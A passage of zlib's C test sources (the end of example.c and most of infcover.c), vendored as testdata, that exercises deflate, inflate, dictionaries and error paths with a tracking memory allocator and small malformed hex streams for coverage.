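        err = inflate(&d_stream, Z_NO_FLUSH);
        if (err == Z_STREAM_END) break;
        CHECK_ERR(err, "inflate");
    }

    err = inflateEnd(&d_stream);
    CHECK_ERR(err, "inflateEnd");

    if (strcmp((char*)uncompr, hello)) {
        fprintf(stderr, "bad inflate\n");
        exit(1);
    } else {
        printf("inflate(): %s\n", (char *)uncompr);
    }
}

/* ===========================================================================
 * Test deflate() with large buffers and dynamic change of compression level
 *
 * Feeds three inputs into one stream written to compr: uncompr
 * (uncomprLen bytes), the first uncomprLen/2 bytes of compr itself with
 * compression switched off, and uncompr again at the best level.
 * Exits with status 1 on any unexpected result.
 */
void test_large_deflate(Byte *compr, uLong comprLen, Byte *uncompr,
                        uLong uncomprLen) {
    z_stream c_stream; /* compression stream */
    int err;

    c_stream.zalloc = zalloc;
    c_stream.zfree = zfree;
    c_stream.opaque = (voidpf)0;

    err = deflateInit(&c_stream, Z_BEST_SPEED);
    CHECK_ERR(err, "deflateInit");

    c_stream.next_out = compr;
    c_stream.avail_out = (uInt)comprLen;

    /* At this point, uncompr is still mostly zeroes, so it should compress
     * very well:
     */
    c_stream.next_in = uncompr;
    c_stream.avail_in = (uInt)uncomprLen;
    err = deflate(&c_stream, Z_NO_FLUSH);
    CHECK_ERR(err, "deflate");
    if (c_stream.avail_in != 0) {
        fprintf(stderr, "deflate not greedy\n");
        exit(1);
    }

    /* Feed in already compressed data and switch to no compression: */
    /* NOTE(review): the deflateParams() results are not checked in this
     * function; a failed switch would go unnoticed here. */
    deflateParams(&c_stream, Z_NO_COMPRESSION, Z_DEFAULT_STRATEGY);
    c_stream.next_in = compr;
    c_stream.avail_in = (uInt)uncomprLen/2;
    err = deflate(&c_stream, Z_NO_FLUSH);
    CHECK_ERR(err, "deflate");

    /* Switch back to compressing mode: */
    deflateParams(&c_stream, Z_BEST_COMPRESSION, Z_FILTERED);
    c_stream.next_in = uncompr;
    c_stream.avail_in = (uInt)uncomprLen;
    err = deflate(&c_stream, Z_NO_FLUSH);
    CHECK_ERR(err, "deflate");

    err = deflate(&c_stream, Z_FINISH);
    if (err != Z_STREAM_END) {
        fprintf(stderr, "deflate should report Z_STREAM_END\n");
        exit(1);
    }
    err = deflateEnd(&c_stream);
    CHECK_ERR(err, "deflateEnd");
}

/* ===========================================================================
 * Test inflate() with large buffers
 *
 * Expands the stream in compr, reusing uncompr as a scratch buffer for each
 * call, and checks only the total number of bytes produced: it must equal
 * the 2*uncomprLen + uncomprLen/2 bytes fed in by test_large_deflate().
 */
void test_large_inflate(Byte *compr, uLong comprLen, Byte *uncompr,
                        uLong uncomprLen) {
    int err;
    z_stream d_stream; /* decompression stream */

    strcpy((char*)uncompr, "garbage");

    d_stream.zalloc = zalloc;
    d_stream.zfree = zfree;
    d_stream.opaque = (voidpf)0;

    d_stream.next_in  = compr;
    d_stream.avail_in = (uInt)comprLen;

    err = inflateInit(&d_stream);
    CHECK_ERR(err, "inflateInit");

    for (;;) {
        d_stream.next_out = uncompr;            /* discard the output */
        d_stream.avail_out = (uInt)uncomprLen;
        err = inflate(&d_stream, Z_NO_FLUSH);
        if (err == Z_STREAM_END) break;
        CHECK_ERR(err, "large inflate");
    }

    err = inflateEnd(&d_stream);
    CHECK_ERR(err, "inflateEnd");

    if (d_stream.total_out != 2*uncomprLen + uncomprLen/2) {
        /* total_out is unsigned, so it is printed with %lu rather than %ld */
        fprintf(stderr, "bad large inflate: %lu\n",
                (unsigned long)d_stream.total_out);
        exit(1);
    } else {
        printf("large_inflate(): OK\n");
    }
}

/* ===========================================================================
 * Test deflate() with full flush
 *
 * Compresses the first three bytes of hello with Z_FULL_FLUSH, deliberately
 * corrupts compr[3], then finishes the stream. On return *comprLen holds the
 * number of compressed bytes written; on entry it is the capacity of compr.
 */
void test_flush(Byte *compr, uLong *comprLen) {
    z_stream c_stream; /* compression stream */
    int err;
    uInt len = (uInt)strlen(hello)+1;

    c_stream.zalloc = zalloc;
    c_stream.zfree = zfree;
    c_stream.opaque = (voidpf)0;

    err = deflateInit(&c_stream, Z_DEFAULT_COMPRESSION);
    CHECK_ERR(err, "deflateInit");

    c_stream.next_in  = (z_const unsigned char *)hello;
    c_stream.next_out = compr;
    c_stream.avail_in = 3;
    c_stream.avail_out = (uInt)*comprLen;
    err = deflate(&c_stream, Z_FULL_FLUSH);
    CHECK_ERR(err, "deflate");

    compr[3]++; /* force an error in first compressed block */
    c_stream.avail_in = len - 3;

    err = deflate(&c_stream, Z_FINISH);
    if (err != Z_STREAM_END) {
        CHECK_ERR(err, "deflate");
    }
    err = deflateEnd(&c_stream);
    CHECK_ERR(err, "deflateEnd");

    *comprLen = c_stream.total_out;
}

/* ===========================================================================
 * Test inflateSync()
 *
 * Reads the two-byte zlib header of the stream damaged by test_flush(),
 * resynchronizes with inflateSync() and expects the remainder to inflate to
 * Z_STREAM_END. The caller is assumed to pass comprLen >= 2, since
 * comprLen-2 is used as the remaining input length.
 */
void test_sync(Byte *compr, uLong comprLen, Byte *uncompr, uLong uncomprLen) {
    int err;
    z_stream d_stream; /* decompression stream */

    strcpy((char*)uncompr, "garbage");

    d_stream.zalloc = zalloc;
    d_stream.zfree = zfree;
    d_stream.opaque = (voidpf)0;

    d_stream.next_in  = compr;
    d_stream.avail_in = 2; /* just read the zlib header */

    err = inflateInit(&d_stream);
    CHECK_ERR(err, "inflateInit");

    d_stream.next_out = uncompr;
    d_stream.avail_out = (uInt)uncomprLen;

    err = inflate(&d_stream, Z_NO_FLUSH);
    CHECK_ERR(err, "inflate");

    d_stream.avail_in = (uInt)comprLen-2;   /* read all compressed data */
    err = inflateSync(&d_stream);           /* but skip the damaged part */
    CHECK_ERR(err, "inflateSync");

    err = inflate(&d_stream, Z_FINISH);
    if (err != Z_STREAM_END) {
        fprintf(stderr, "inflate should report Z_STREAM_END\n");
        exit(1);
    }
    err = inflateEnd(&d_stream);
    CHECK_ERR(err, "inflateEnd");

    printf("after inflateSync(): hel%s\n", (char *)uncompr);
}

/* ===========================================================================
 * Test deflate() with preset dictionary
 *
 * Compresses hello into compr (capacity comprLen) after installing
 * dictionary, and records the dictionary's Adler-32 in dictId for
 * test_dict_inflate().
 */
void test_dict_deflate(Byte *compr, uLong comprLen) {
    z_stream c_stream; /* compression stream */
    int err;

    c_stream.zalloc = zalloc;
    c_stream.zfree = zfree;
    c_stream.opaque = (voidpf)0;

    err = deflateInit(&c_stream, Z_BEST_COMPRESSION);
    CHECK_ERR(err, "deflateInit");

    err = deflateSetDictionary(&c_stream,
                (const Bytef*)dictionary, (int)sizeof(dictionary));
    CHECK_ERR(err, "deflateSetDictionary");

    dictId = c_stream.adler;
    c_stream.next_out = compr;
    c_stream.avail_out = (uInt)comprLen;

    c_stream.next_in = (z_const unsigned char *)hello;
    c_stream.avail_in = (uInt)strlen(hello)+1;

    err = deflate(&c_stream, Z_FINISH);
    if (err != Z_STREAM_END) {
        fprintf(stderr, "deflate should report Z_STREAM_END\n");
        exit(1);
    }
    err = deflateEnd(&c_stream);
    CHECK_ERR(err, "deflateEnd");
}

/* ===========================================================================
 * Test inflate() with a preset dictionary
 *
 * Expands compr into uncompr. When inflate() asks for a dictionary, the
 * requested Adler-32 must match dictId before dictionary is supplied.
 * Exits with status 1 unless the output equals hello.
 */
void test_dict_inflate(Byte *compr, uLong comprLen, Byte *uncompr,
                       uLong uncomprLen) {
    int err;
    z_stream d_stream; /* decompression stream */

    strcpy((char*)uncompr, "garbage");

    d_stream.zalloc = zalloc;
    d_stream.zfree = zfree;
    d_stream.opaque = (voidpf)0;

    d_stream.next_in  = compr;
    d_stream.avail_in = (uInt)comprLen;

    err = inflateInit(&d_stream);
    CHECK_ERR(err, "inflateInit");

    d_stream.next_out = uncompr;
    d_stream.avail_out = (uInt)uncomprLen;

    for (;;) {
        err = inflate(&d_stream, Z_NO_FLUSH);
        if (err == Z_STREAM_END) break;
        if (err == Z_NEED_DICT) {
            if (d_stream.adler != dictId) {
                /* newline added so the diagnostic ends its line like the
                 * other messages in this file */
                fprintf(stderr, "unexpected dictionary\n");
                exit(1);
            }
            err = inflateSetDictionary(&d_stream, (const Bytef*)dictionary,
                                       (int)sizeof(dictionary));
        }
        CHECK_ERR(err, "inflate with dict");
    }

    err = inflateEnd(&d_stream);
    CHECK_ERR(err, "inflateEnd");

    if (strcmp((char*)uncompr, hello)) {
        fprintf(stderr, "bad inflate with dict\n");
        exit(1);
    } else {
        printf("inflate with dictionary: %s\n", (char *)uncompr);
    }
}

/* ===========================================================================
 * Usage:  example [output.gz  [input.gz]]
 */

int main(int argc, char *argv[]) {
    Byte *compr, *uncompr;
    uLong uncomprLen = 20000;
    uLong comprLen = 3 * uncomprLen;
    static const char* myVersion = ZLIB_VERSION;

    if (zlibVersion()[0] != myVersion[0]) {
        fprintf(stderr, "incompatible zlib version\n");
        exit(1);

    } else if (strcmp(zlibVersion(), ZLIB_VERSION) != 0) {
        fprintf(stderr, "warning: different zlib version linked: %s\n",
                zlibVersion());
    }

    printf("zlib version %s = 0x%04x, compile flags = 0x%lx\n",
            ZLIB_VERSION, ZLIB_VERNUM, zlibCompileFlags());

    compr    = (Byte*)calloc((uInt)comprLen, 1);
    uncompr  = (Byte*)calloc((uInt)uncomprLen, 1);
    /* compr and uncompr are cleared to avoid reading uninitialized
     * data and to ensure that uncompr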
compresses well. */ if (compr == Z_NULL || uncompr == Z_NULL) { printf("out of memory\n"); exit(1); } #ifdef Z_SOLO (void)argc; (void)argv; #else test_compress(compr, comprLen, uncompr, uncomprLen); test_gzio((argc > 1 ? argv[1] : TESTFILE), uncompr, uncomprLen); #endif test_deflate(compr, comprLen); test_inflate(compr, comprLen, uncompr, uncomprLen); test_large_deflate(compr, comprLen, uncompr, uncomprLen); test_large_inflate(compr, comprLen, uncompr, uncomprLen); test_flush(compr, &comprLen); test_sync(compr, comprLen, uncompr, uncomprLen); comprLen = 3 * uncomprLen; test_dict_deflate(compr, comprLen); test_dict_inflate(compr, comprLen, uncompr, uncomprLen); free(compr); free(uncompr); return 0; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/test/infcover.c ================================================ /* infcover.c -- test zlib's inflate routines with full code coverage * Copyright (C) 2011, 2016 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* to use, do: ./configure --cover && make cover */ #include #include #include #include #include "zlib.h" /* get definition of internal structure so we can mess with it (see pull()), and so we can call inflate_trees() (see cover5()) */ #define ZLIB_INTERNAL #include "inftrees.h" #include "inflate.h" #define local static /* -- memory tracking routines -- */ /* These memory tracking routines are provided to zlib and track all of zlib's allocations and deallocations, check for LIFO operations, keep a current and high water mark of total bytes requested, optionally set a limit on the total memory that can be allocated, and when done check for memory leaks. 
   They are used as follows:

   z_stream strm;
   mem_setup(&strm)         initializes the memory tracking and sets the
                            zalloc, zfree, and opaque members of strm to use
                            memory tracking for all zlib operations on strm
   mem_limit(&strm, limit)  sets a limit on the total bytes requested -- a
                            request that exceeds this limit will result in an
                            allocation failure (returns NULL) -- setting the
                            limit to zero means no limit, which is the default
                            after mem_setup()
   mem_used(&strm, "msg")   prints to stderr "msg" and the total bytes used
   mem_high(&strm, "msg")   prints to stderr "msg" and the high water mark
   mem_done(&strm, "msg")   ends memory tracking, releases all allocations
                            for the tracking as well as leaked zlib blocks, if
                            any.  If there was anything unusual, such as leaked
                            blocks, non-LIFO frees, or frees of addresses not
                            allocated, then "msg" and information about the
                            problem is printed to stderr.  If everything is
                            normal, nothing is printed. mem_done resets the
                            strm members to Z_NULL to use the default memory
                            allocation routines on the next zlib initialization
                            using strm.
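*/

/* these items are strung together in a linked list, one for each allocation */
struct mem_item {
    void *ptr;                  /* pointer to allocated memory */
    size_t size;                /* requested size of allocation */
    struct mem_item *next;      /* pointer to next item in list, or NULL */
};

/* this structure is at the root of the linked list, and tracks statistics */
struct mem_zone {
    struct mem_item *first;     /* pointer to first item in list, or NULL */
    size_t total, highwater;    /* total allocations, and largest total */
    size_t limit;               /* memory allocation limit, or 0 if no limit */
    int notlifo, rogue;         /* counts of non-LIFO frees and rogue frees */
};

/* memory allocation routine to pass to zlib -- mem is the mem_zone installed
   by mem_setup(), count and size are multiplied to get the request in bytes.
   Returns the new block, or NULL when there is no zone, when the request
   would take the zone past its limit, or when malloc() fails. */
local void *mem_alloc(void *mem, unsigned count, unsigned size) {
    void *ptr;
    struct mem_item *item;
    struct mem_zone *zone = mem;
    size_t len;

    /* no zone to account against */
    if (zone == NULL)
        return NULL;

    /* refuse a request whose byte count cannot be represented in size_t,
       instead of letting the product wrap to a smaller allocation */
    if (size != 0 && count > (size_t)-1 / size)
        return NULL;
    len = count * (size_t)size;

    /* induced allocation failure -- written so that total + len is never
       formed, since that sum could wrap past the limit */
    if (zone->limit &&
        (zone->total > zone->limit || len > zone->limit - zone->total))
        return NULL;

    /* perform allocation using the standard library, fill memory with a
       non-zero value to make sure that the code isn't depending on zeros */
    ptr = malloc(len);
    if (ptr == NULL)
        return NULL;
    memset(ptr, 0xa5, len);

    /* create a new item for the list */
    item = malloc(sizeof(struct mem_item));
    if (item == NULL) {
        free(ptr);
        return NULL;
    }
    item->ptr = ptr;
    item->size = len;

    /* insert item at the beginning of the list */
    item->next = zone->first;
    zone->first = item;

    /* update the statistics */
    zone->total += item->size;
    if (zone->total > zone->highwater)
        zone->highwater = zone->total;

    /* return the allocated memory */
    return ptr;
}

/* memory free routine to pass to zlib -- ptr is always handed to free(); the
   zone only records whether the free was LIFO, out of order, or unknown */
local void mem_free(void *mem, void *ptr) {
    struct mem_item *item, *next;
    struct mem_zone *zone = mem;

    /* if no zone, just do a free */
    if (zone == NULL) {
        free(ptr);
        return;
    }

    /* point next to the item that matches ptr, or NULL if not found -- remove
       the item from the linked list if found */
    next = zone->first;
    if (next) {
        if (next->ptr == ptr)
            zone->first = next->next;   /* first one is it, remove from list */
        else {
            do {                        /* search the linked list */
                item = next;
                next = item->next;
            } while (next != NULL && next->ptr != ptr);
            if (next) {                 /* if found, remove from linked list */
                item->next = next->next;
                zone->notlifo++;        /* not a LIFO free */
            }
        }
    }

    /* if found, update the statistics and free the item */
    if (next) {
        zone->total -= next->size;
        free(next);
    }

    /* if not found, update the rogue count */
    else
        zone->rogue++;

    /* in any case, do the requested free with the standard library function */
    free(ptr);
}

/* set up a controlled memory allocation space for monitoring, set the stream
   parameters to the controlled routines, with opaque pointing to the space */
local void mem_setup(z_stream *strm) {
    struct mem_zone *zone;

    zone = malloc(sizeof(struct mem_zone));
    /* NOTE(review): the only guard is an assert, so a build with NDEBUG
       would dereference a NULL zone below */
    assert(zone != NULL);
    zone->first = NULL;
    zone->total = 0;
    zone->highwater = 0;
    zone->limit = 0;
    zone->notlifo = 0;
    zone->rogue = 0;
    strm->opaque = zone;
    strm->zalloc = mem_alloc;
    strm->zfree = mem_free;
}

/* set a limit on the total memory allocation, or 0 to remove the limit */
local void mem_limit(z_stream *strm, size_t limit) {
    struct mem_zone *zone = strm->opaque;

    zone->limit = limit;
}

/* show the current total requested allocations in bytes */
local void mem_used(z_stream *strm, char *prefix) {
    struct mem_zone *zone = strm->opaque;

    /* size_t is not unsigned long everywhere, so convert to match %lu */
    fprintf(stderr, "%s: %lu allocated\n", prefix,
            (unsigned long)zone->total);
}

/* show the high water allocation in bytes */
local void mem_high(z_stream *strm, char *prefix) {
    struct mem_zone *zone = strm->opaque;

    fprintf(stderr, "%s: %lu high water mark\n", prefix,
            (unsigned long)zone->highwater);
}

/* release the memory allocation zone -- if there are any surprises, notify */
local void mem_done(z_stream *strm, char *prefix) {
    int count = 0;
    struct mem_item *item, *next;
    struct mem_zone *zone = strm->opaque;

    /* show high water mark */
    mem_high(strm, prefix);

    /* free leftover allocations and item structures, if any */
    item = zone->first;
    while (item != NULL) {
        free(item->ptr);
        next = item->next;
        free(item);
        item = next;
        count++;
    }

    /* issue alerts about anything unexpected */
    if (count || zone->total)
        fprintf(stderr, "** %s: %lu bytes in %d blocks not freed\n",
                prefix, (unsigned long)zone->total, count);
    if (zone->notlifo)
        fprintf(stderr, "** %s: %d frees not LIFO\n", prefix, zone->notlifo);
    if (zone->rogue)
        fprintf(stderr, "** %s: %d frees not recognized\n",
                prefix, zone->rogue);

    /* free the zone and delete from the stream */
    free(zone);
    strm->opaque = Z_NULL;
    strm->zalloc = Z_NULL;
    strm->zfree = Z_NULL;
}

/* -- inflate test routines -- */

/* Decode a hexadecimal string, set *len to length, in[] to the bytes.  This
   decodes liberally, in that hex digits can be adjacent, in which case two in
   a row writes a byte.  Or they can be delimited by any non-hex character,
   where the delimiters are ignored except when a single hex digit is followed
   by a delimiter, where that single digit writes a byte.  The returned data is
   allocated and must eventually be freed.  NULL is returned if out of memory.
   If the length is not needed, then len can be NULL. */
local unsigned char *h2b(const char *hex, unsigned *len) {
    unsigned char *in, *re;
    unsigned next, val;

    in = malloc((strlen(hex) + 1) >> 1);
    if (in == NULL)
        return NULL;
    next = 0;
    val = 1;
    do {
        if (*hex >= '0' && *hex <= '9')
            val = (val << 4) + *hex - '0';
        else if (*hex >= 'A' && *hex <= 'F')
            val = (val << 4) + *hex - 'A' + 10;
        else if (*hex >= 'a' && *hex <= 'f')
            val = (val << 4) + *hex - 'a' + 10;
        else if (val != 1 && val < 32)  /* one digit followed by delimiter */
            val += 240;                 /* make it look like two digits */
        if (val > 255) {                /* have two digits */
            in[next++] = val & 0xff;    /* save the decoded byte */
            val = 1;                    /* start over */
        }
    } while (*hex++);       /* go through the loop with the terminating null */
    if (len != NULL)
        *len = next;

    /* nothing was decoded: keep the buffer as it is.  A zero-size realloc()
       may release the block and return NULL, and the fallback below would
       then hand the caller a pointer that has already been freed. */
    if (next == 0)
        return in;

    /* shrink to the decoded length, keeping the original block on failure */
    re = realloc(in, next);
    return re == NULL ? in : re;
}

/* generic inflate() run, where hex is the hexadecimal input data, what is the
   text to include in an error message, step is how much input data to feed
   inflate() on each call, or zero to feed it all, win is the window bits
   parameter to inflateInit2(), len is the size of the output buffer, and err
   is the error code expected from the first inflate() call (the second
   inflate() call is expected to return Z_STREAM_END).  If win is 47, then
   header information is collected with inflateGetHeader().  If a zlib stream
   is looking for a dictionary, then an empty dictionary is provided.
   inflate() is run until all of the input data is consumed. */
local void inf(char *hex, char *what, unsigned step, int win, unsigned len,
               int err) {
    int ret;
    unsigned have;
    unsigned char *in, *out;
    z_stream strm, copy;
    gz_header head;

    mem_setup(&strm);
    strm.avail_in = 0;
    strm.next_in = Z_NULL;
    ret = inflateInit2(&strm, win);
    if (ret != Z_OK) {
        mem_done(&strm, what);
        return;
    }
    out = malloc(len);
    assert(out != NULL);
    if (win == 47) {
        head.extra = out;
        head.extra_max = len;
        head.name = out;
        head.name_max = len;
        head.comment = out;
        head.comm_max = len;
        ret = inflateGetHeader(&strm, &head);
        assert(ret == Z_OK);
    }
    in = h2b(hex, &have);
    assert(in != NULL);
    if (step == 0 || step > have)
        step = have;
    strm.avail_in = step;
    have -= step;
    strm.next_in = in;
    do {
        strm.avail_out = len;
        strm.next_out = out;
        ret = inflate(&strm, Z_NO_FLUSH);
        assert(err == 9 || ret == err);
        if (ret != Z_OK && ret != Z_BUF_ERROR && ret != Z_NEED_DICT)
            break;
        if (ret == Z_NEED_DICT) {
            ret = inflateSetDictionary(&strm, in, 1);
            assert(ret == Z_DATA_ERROR);
            mem_limit(&strm, 1);
            ret = inflateSetDictionary(&strm, out, 0);
            assert(ret == Z_MEM_ERROR);
            mem_limit(&strm, 0);
            ((struct inflate_state *)strm.state)->mode = DICT;
            ret = inflateSetDictionary(&strm, out, 0);
            assert(ret == Z_OK);
            ret = inflate(&strm, Z_NO_FLUSH);
            assert(ret == Z_BUF_ERROR);
        }
        /* exercise inflateCopy() on the live stream, then discard the copy */
        ret = inflateCopy(&copy, &strm);
        assert(ret == Z_OK);
        ret = inflateEnd(&copy);
        assert(ret == Z_OK);
        err = 9;                        /* don't care next time around */
        have += strm.avail_in;
        strm.avail_in = step > have ? have : step;
        have -= strm.avail_in;
    } while (strm.avail_in);
    free(in);
    free(out);
    ret = inflateReset2(&strm, -8);
    assert(ret == Z_OK);
    ret = inflateEnd(&strm);
    assert(ret == Z_OK);
    mem_done(&strm, what);
}

/* cover all of the lines in inflate.c up to inflate() */
local void cover_support(void) {
    int ret;
    z_stream strm;

    mem_setup(&strm);
    strm.avail_in = 0;
    strm.next_in = Z_NULL;
    ret = inflateInit(&strm);
    assert(ret == Z_OK);
    mem_used(&strm, "inflate init");
    ret = inflatePrime(&strm, 5, 31);
    assert(ret == Z_OK);
    ret = inflatePrime(&strm, -1, 0);
    assert(ret == Z_OK);
    ret = inflateSetDictionary(&strm, Z_NULL, 0);
    assert(ret == Z_STREAM_ERROR);
    ret = inflateEnd(&strm);
    assert(ret == Z_OK);
    mem_done(&strm, "prime");

    inf("63 0", "force window allocation", 0, -15, 1, Z_OK);
    inf("63 18 5", "force window replacement", 0, -8, 259, Z_OK);
    inf("63 18 68 30 d0 0 0", "force split window update", 4, -8, 259, Z_OK);
    inf("3 0", "use fixed blocks", 0, -15, 1, Z_STREAM_END);
    inf("", "bad window size", 0, 1, 0, Z_STREAM_ERROR);

    mem_setup(&strm);
    strm.avail_in = 0;
    strm.next_in = Z_NULL;
    ret = inflateInit_(&strm, "!", (int)sizeof(z_stream));
    assert(ret == Z_VERSION_ERROR);
    mem_done(&strm, "wrong version");

    /* mem_done() reset the allocator members, so this init uses zlib's
       built-in memory routines */
    strm.avail_in = 0;
    strm.next_in = Z_NULL;
    ret = inflateInit(&strm);
    assert(ret == Z_OK);
    ret = inflateEnd(&strm);
    assert(ret == Z_OK);
    fputs("inflate built-in memory routines\n", stderr);
}

/* cover all inflate() header and trailer cases and code after inflate() */
local void cover_wrap(void) {
    int ret;
    z_stream strm, copy;
    unsigned char dict[257];

    ret = inflate(Z_NULL, 0);
    assert(ret == Z_STREAM_ERROR);
    ret = inflateEnd(Z_NULL);
    assert(ret == Z_STREAM_ERROR);
    ret = inflateCopy(Z_NULL, Z_NULL);
    assert(ret == Z_STREAM_ERROR);
    fputs("inflate bad parameters\n", stderr);

    inf("1f 8b 0 0", "bad gzip method", 0, 31, 0, Z_DATA_ERROR);
    inf("1f 8b 8 80", "bad gzip flags", 0, 31, 0, Z_DATA_ERROR);
    inf("77 85", "bad zlib method", 0, 15, 0, Z_DATA_ERROR);
    inf("8 99", "set window size from header", 0, 0, 0, Z_OK);
    inf("78 9c", "bad zlib window size", 0, 8, 0, Z_DATA_ERROR);
    inf("78 9c 63 0 0 0 1 0 1", "check adler32", 0, 15, 1, Z_STREAM_END);
    inf("1f 8b 8 1e 0 0 0 0 0 0 1 0 0 0 0 0 0", "bad header crc", 0, 47, 1,
        Z_DATA_ERROR);
    inf("1f 8b 8 2 0 0 0 0 0 0 1d 26 3 0 0 0 0 0 0 0 0 0", "check gzip length",
        0, 47, 0, Z_STREAM_END);
    inf("78 90", "bad zlib header check", 0, 47, 0, Z_DATA_ERROR);
    inf("8 b8 0 0 0 1", "need dictionary", 0, 8, 0, Z_NEED_DICT);
    inf("78 9c 63 0", "compute adler32", 0, 15, 1, Z_OK);

    mem_setup(&strm);
    strm.avail_in = 0;
    strm.next_in = Z_NULL;
    ret = inflateInit2(&strm, -8);
    strm.avail_in = 2;
    strm.next_in = (void *)"\x63";
    strm.avail_out = 1;
    strm.next_out = (void *)&ret;   /* one byte of output lands in ret */
    mem_limit(&strm, 1);
    ret = inflate(&strm, Z_NO_FLUSH);
    assert(ret == Z_MEM_ERROR);
    ret = inflate(&strm, Z_NO_FLUSH);
    assert(ret == Z_MEM_ERROR);
    mem_limit(&strm, 0);
    memset(dict, 0, 257);
    ret = inflateSetDictionary(&strm, dict, 257);
    assert(ret == Z_OK);
    mem_limit(&strm, (sizeof(struct inflate_state) << 1) + 256);
    ret = inflatePrime(&strm, 16, 0);
    assert(ret == Z_OK);
    strm.avail_in = 2;
    strm.next_in = (void *)"\x80";
    ret = inflateSync(&strm);
    assert(ret == Z_DATA_ERROR);
    ret = inflate(&strm, Z_NO_FLUSH);
    assert(ret == Z_STREAM_ERROR);
    strm.avail_in = 4;
    strm.next_in = (void *)"\0\0\xff\xff";
    ret = inflateSync(&strm);
    assert(ret == Z_OK);
    (void)inflateSyncPoint(&strm);
    ret = inflateCopy(&copy, &strm);
    assert(ret == Z_MEM_ERROR);
    mem_limit(&strm, 0);
    ret = inflateUndermine(&strm, 1);
    assert(ret == Z_DATA_ERROR);
    (void)inflateMark(&strm);
    ret = inflateEnd(&strm);
    assert(ret == Z_OK);
    mem_done(&strm, "miscellaneous, force memory errors");
}

/* input and output functions for inflateBack() */
local unsigned pull(void *desc, unsigned char **buf) {
    static unsigned int next = 0;
    static unsigned char dat[] = {0x63, 0, 2, 0};
    struct inflate_state *state;

    if (desc == Z_NULL) {
        next = 0;
        return 0;   /* no input (already provided at next_in) */
    }
    state = (void *)((z_stream *)desc)->state;
    if (state != Z_NULL)
        state->mode = SYNC;     /* force an otherwise impossible situation */
    /* hand out dat[] one byte per call, then report end of input */
    return next < sizeof(dat) ? (*buf = dat + next++, 1) : 0;
}

local int push(void *desc, unsigned char *buf, unsigned len) {
    (void)buf;
    (void)len;
    return desc != Z_NULL;      /* force error if desc not null */
}

/* cover inflateBack() up to common deflate data cases and after those */
local void cover_back(void) {
    int ret;
    z_stream strm;
    unsigned char win[32768];

    ret = inflateBackInit_(Z_NULL, 0, win, 0, 0);
    assert(ret == Z_VERSION_ERROR);
    ret = inflateBackInit(Z_NULL, 0, win);
    assert(ret == Z_STREAM_ERROR);
    ret = inflateBack(Z_NULL, Z_NULL, Z_NULL, Z_NULL, Z_NULL);
    assert(ret == Z_STREAM_ERROR);
    ret = inflateBackEnd(Z_NULL);
    assert(ret == Z_STREAM_ERROR);
    fputs("inflateBack bad parameters\n", stderr);

    mem_setup(&strm);
    ret = inflateBackInit(&strm, 15, win);
    assert(ret == Z_OK);
    strm.avail_in = 2;
    strm.next_in = (void *)"\x03";
    ret = inflateBack(&strm, pull, Z_NULL, push, Z_NULL);
    assert(ret == Z_STREAM_END);
        /* force output error */
    strm.avail_in = 3;
    strm.next_in = (void *)"\x63\x00";
    ret = inflateBack(&strm, pull, Z_NULL, push, &strm);
    assert(ret == Z_BUF_ERROR);
        /* force mode error by mucking with state */
    ret = inflateBack(&strm, pull, &strm, push, Z_NULL);
    assert(ret == Z_STREAM_ERROR);
    ret = inflateBackEnd(&strm);
    assert(ret == Z_OK);
    mem_done(&strm, "inflateBack bad state");

    ret = inflateBackInit(&strm, 15, win);
    assert(ret == Z_OK);
    ret = inflateBackEnd(&strm);
    assert(ret == Z_OK);
    fputs("inflateBack built-in memory routines\n", stderr);
}

/* do a raw inflate of data in hexadecimal with both inflate and inflateBack */
local int try(char *hex, char *id, int err) {
    int ret;
    unsigned len, size;
    unsigned char *in, *out, *win;
    char *prefix;
    z_stream strm;

    /* convert to hex */
    in = h2b(hex, &len);
    assert(in != NULL);

    /* allocate work areas */
    size = len << 3;
    out = malloc(size);
    assert(out != NULL);
    win = malloc(32768);
    assert(win != NULL);
    prefix = malloc(strlen(id) + 6);    /* id plus "-late" or "-back" and NUL */
    assert(prefix != NULL);

    /* first with inflate */
    strcpy(prefix, id);
    strcat(prefix, "-late");
    mem_setup(&strm);
    strm.avail_in = 0;
    strm.next_in = Z_NULL;
    ret = inflateInit2(&strm, err < 0 ? 47 : -15);
    assert(ret == Z_OK);
    strm.avail_in = len;
    strm.next_in = in;
    do {
        strm.avail_out = size;
        strm.next_out = out;
        ret = inflate(&strm, Z_TREES);
        assert(ret != Z_STREAM_ERROR && ret != Z_MEM_ERROR);
        if (ret == Z_DATA_ERROR || ret == Z_NEED_DICT)
            break;
    } while (strm.avail_in || strm.avail_out == 0);
    if (err) {
        assert(ret == Z_DATA_ERROR);
        assert(strcmp(id, strm.msg) == 0);
    }
    inflateEnd(&strm);
    mem_done(&strm, prefix);

    /* then with inflateBack */
    if (err >= 0) {
        strcpy(prefix, id);
        strcat(prefix, "-back");
        mem_setup(&strm);
        ret = inflateBackInit(&strm, 15, win);
        assert(ret == Z_OK);
        strm.avail_in = len;
        strm.next_in = in;
        ret = inflateBack(&strm, pull, Z_NULL, push, Z_NULL);
        assert(ret != Z_STREAM_ERROR);
        if (err) {
            assert(ret == Z_DATA_ERROR);
            assert(strcmp(id, strm.msg) == 0);
        }
        inflateBackEnd(&strm);
        mem_done(&strm, prefix);
    }

    /* clean up */
    free(prefix);
    free(win);
    free(out);
    free(in);
    return ret;
}

/* cover deflate data cases in both inflate() and inflateBack() */
local void cover_inflate(void) {
    try("0 0 0 0 0", "invalid stored block lengths", 1);
    try("3 0", "fixed", 0);
    try("6", "invalid block type", 1);
    try("1 1 0 fe ff 0", "stored", 0);
    try("fc 0 0", "too many length or distance symbols", 1);
    try("4 0 fe ff", "invalid code lengths set", 1);
    try("4 0 24 49 0", "invalid bit length repeat", 1);
    try("4 0 24 e9 ff ff", "invalid bit length repeat", 1);
    try("4 0 24 e9 ff 6d", "invalid code -- missing end-of-block", 1);
    try("4 80 49 92 24 49 92 24 71 ff ff 93 11 0",
        "invalid literal/lengths set", 1);
    try("4 80 49 92 24 49 92 24 f b4 ff ff c3 84", "invalid distances set", 1);
    try("4 c0 81 8 0 0 0 0 20 7f eb b 0 0", "invalid literal/length code", 1);
    try("2 7e ff ff", "invalid distance code", 1);
    try("c c0 81 0 0 0 0 0 90 ff 6b 4 0", "invalid distance too far back", 1);

    /* also trailer mismatch just in inflate() */
    try("1f 8b 8 0 0 0 0 0 0 0 3 0 0 0 0 1", "incorrect data check", -1);
    try("1f 8b 8 0 0 0 0 0 0 0 3 0 0 0 0 0 0 0 0 1",
        "incorrect length check", -1);
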